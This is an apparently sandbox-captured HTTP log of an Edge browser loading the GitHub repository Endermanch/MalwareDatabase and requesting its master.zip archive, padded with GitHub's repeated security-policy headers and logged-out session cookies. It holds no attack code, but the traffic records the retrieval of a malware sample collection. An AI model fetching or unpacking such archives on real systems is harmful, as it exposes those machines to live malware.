content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
x-html-safe: 1acd6d13f4d8f9d6cab65040ac3316bf2b7a8c8777308253038c27aeb609e9fe
accept-ranges: bytes
content-length: 95
x-github-request-id: DE97:126F1E:604301D:619FEFF:65E0A39F
-
Remote address:140.82.121.4:443RequestGET /Endermanch/MalwareDatabase/latest-commit/master HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=khjbbUuNbo0OXHs4iEO%2BlZmNwN6ePoDJpEP%2B55fSkTqSKyRs0nuQfO4UUeewljqEqAMb%2FD3sDHCkfIx4N85tolHIGj5H%2FQhVbKW0amKNuHw9UaeKcPYQ%2BfDg5iPOMVYOX4rRa4vSkgrceQe8vDiJm4hIq5fmwMwnUb22JsHUgEQBFhW3QZNSnD31FwP1%2FRGDnd3K3xtIblZC1%2B8VrfjTZJiRZEaAY8xeDUufRihBOsFeM7gelZKecNqtImlP8OMExoVQzUvVs4uJBArPzQ6ZFQ%3D%3D--GvVXCMxa%2B55FfsJ%2B--y85iPPOgVDIcRtvoLPK0yQ%3D%3D
cookie: _octo=GH1.1.664732354.1709220765
cookie: logged_in=no
cookie: preferred_color_mode=light
ResponseHTTP/2.0 200
date: Thu, 29 Feb 2024 15:32:47 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"b58643dfe8783c0009cfe2744b347e4d"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 1063
x-github-request-id: DE97:126F1E:6043013:619FEF5:65E0A39F
-
Remote address:140.82.121.4:443RequestGET /Endermanch/MalwareDatabase/tree-commit-info/master HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=khjbbUuNbo0OXHs4iEO%2BlZmNwN6ePoDJpEP%2B55fSkTqSKyRs0nuQfO4UUeewljqEqAMb%2FD3sDHCkfIx4N85tolHIGj5H%2FQhVbKW0amKNuHw9UaeKcPYQ%2BfDg5iPOMVYOX4rRa4vSkgrceQe8vDiJm4hIq5fmwMwnUb22JsHUgEQBFhW3QZNSnD31FwP1%2FRGDnd3K3xtIblZC1%2B8VrfjTZJiRZEaAY8xeDUufRihBOsFeM7gelZKecNqtImlP8OMExoVQzUvVs4uJBArPzQ6ZFQ%3D%3D--GvVXCMxa%2B55FfsJ%2B--y85iPPOgVDIcRtvoLPK0yQ%3D%3D
cookie: _octo=GH1.1.664732354.1709220765
cookie: logged_in=no
cookie: preferred_color_mode=light
ResponseHTTP/2.0 200
date: Thu, 29 Feb 2024 15:32:47 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"91251b71a61ea359e8add500ef5d41cd"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 457
x-github-request-id: DE97:126F1E:6043011:619FEF1:65E0A39F
-
Remote address:140.82.121.4:443RequestGET /Endermanch/MalwareDatabase/branch-count HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
github-verified-fetch: true
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=khjbbUuNbo0OXHs4iEO%2BlZmNwN6ePoDJpEP%2B55fSkTqSKyRs0nuQfO4UUeewljqEqAMb%2FD3sDHCkfIx4N85tolHIGj5H%2FQhVbKW0amKNuHw9UaeKcPYQ%2BfDg5iPOMVYOX4rRa4vSkgrceQe8vDiJm4hIq5fmwMwnUb22JsHUgEQBFhW3QZNSnD31FwP1%2FRGDnd3K3xtIblZC1%2B8VrfjTZJiRZEaAY8xeDUufRihBOsFeM7gelZKecNqtImlP8OMExoVQzUvVs4uJBArPzQ6ZFQ%3D%3D--GvVXCMxa%2B55FfsJ%2B--y85iPPOgVDIcRtvoLPK0yQ%3D%3D
cookie: _octo=GH1.1.664732354.1709220765
cookie: logged_in=no
cookie: preferred_color_mode=light
ResponseHTTP/2.0 200
date: Thu, 29 Feb 2024 15:32:47 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"56a3b41b3adb53ca7fce5703eb10dacf"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
x-html-safe: 1acd6d13f4d8f9d6cab65040ac3316bf2b7a8c8777308253038c27aeb609e9fe
accept-ranges: bytes
content-length: 97
x-github-request-id: DE97:126F1E:604301C:619FEFE:65E0A39F
-
Remote address:140.82.121.4:443RequestGET /Endermanch/MalwareDatabase/tag-count HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
github-verified-fetch: true
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=khjbbUuNbo0OXHs4iEO%2BlZmNwN6ePoDJpEP%2B55fSkTqSKyRs0nuQfO4UUeewljqEqAMb%2FD3sDHCkfIx4N85tolHIGj5H%2FQhVbKW0amKNuHw9UaeKcPYQ%2BfDg5iPOMVYOX4rRa4vSkgrceQe8vDiJm4hIq5fmwMwnUb22JsHUgEQBFhW3QZNSnD31FwP1%2FRGDnd3K3xtIblZC1%2B8VrfjTZJiRZEaAY8xeDUufRihBOsFeM7gelZKecNqtImlP8OMExoVQzUvVs4uJBArPzQ6ZFQ%3D%3D--GvVXCMxa%2B55FfsJ%2B--y85iPPOgVDIcRtvoLPK0yQ%3D%3D
cookie: _octo=GH1.1.664732354.1709220765
cookie: logged_in=no
cookie: preferred_color_mode=light
ResponseHTTP/2.0 200
date: Thu, 29 Feb 2024 15:32:42 GMT
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
cache-control: max-age=604800, public
etag: W/"c75e05794d72230a695e880f1a6c83a4"
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-type: application/manifest+json; charset=utf-8
content-encoding: gzip
accept-ranges: bytes
content-length: 474
x-github-request-id: DE97:126F1E:604313E:61A001C:65E0A39F
-
Remote address:140.82.121.4:443RequestGET /manifest.json HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: manifest
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=khjbbUuNbo0OXHs4iEO%2BlZmNwN6ePoDJpEP%2B55fSkTqSKyRs0nuQfO4UUeewljqEqAMb%2FD3sDHCkfIx4N85tolHIGj5H%2FQhVbKW0amKNuHw9UaeKcPYQ%2BfDg5iPOMVYOX4rRa4vSkgrceQe8vDiJm4hIq5fmwMwnUb22JsHUgEQBFhW3QZNSnD31FwP1%2FRGDnd3K3xtIblZC1%2B8VrfjTZJiRZEaAY8xeDUufRihBOsFeM7gelZKecNqtImlP8OMExoVQzUvVs4uJBArPzQ6ZFQ%3D%3D--GvVXCMxa%2B55FfsJ%2B--y85iPPOgVDIcRtvoLPK0yQ%3D%3D
cookie: _octo=GH1.1.664732354.1709220765
cookie: logged_in=no
cookie: preferred_color_mode=light
ResponseHTTP/2.0 200
date: Thu, 29 Feb 2024 15:32:47 GMT
content-type: text/fragment+html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
cache-control: max-age=14400, private
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 20
x-github-request-id: DE97:126F1E:6042FA7:619FE8A:65E0A39D
-
Remote address:140.82.121.4:443RequestGET /Endermanch/MalwareDatabase/archive/refs/heads/master.zip HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: text/html, application/xhtml+xml
dnt: 1
turbo-visit: true
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=khjbbUuNbo0OXHs4iEO%2BlZmNwN6ePoDJpEP%2B55fSkTqSKyRs0nuQfO4UUeewljqEqAMb%2FD3sDHCkfIx4N85tolHIGj5H%2FQhVbKW0amKNuHw9UaeKcPYQ%2BfDg5iPOMVYOX4rRa4vSkgrceQe8vDiJm4hIq5fmwMwnUb22JsHUgEQBFhW3QZNSnD31FwP1%2FRGDnd3K3xtIblZC1%2B8VrfjTZJiRZEaAY8xeDUufRihBOsFeM7gelZKecNqtImlP8OMExoVQzUvVs4uJBArPzQ6ZFQ%3D%3D--GvVXCMxa%2B55FfsJ%2B--y85iPPOgVDIcRtvoLPK0yQ%3D%3D
cookie: _octo=GH1.1.664732354.1709220765
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 302
date: Thu, 29 Feb 2024 15:32:56 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
location: https://codeload.github.com/Endermanch/MalwareDatabase/zip/refs/heads/master
cache-control: max-age=0, private
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-length: 0
x-github-request-id: DE97:126F1E:6046B17:61A3A9B:65E0A39F
-
Remote address:140.82.121.4:443RequestGET /Endermanch/MalwareDatabase/archive/refs/heads/master.zip HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
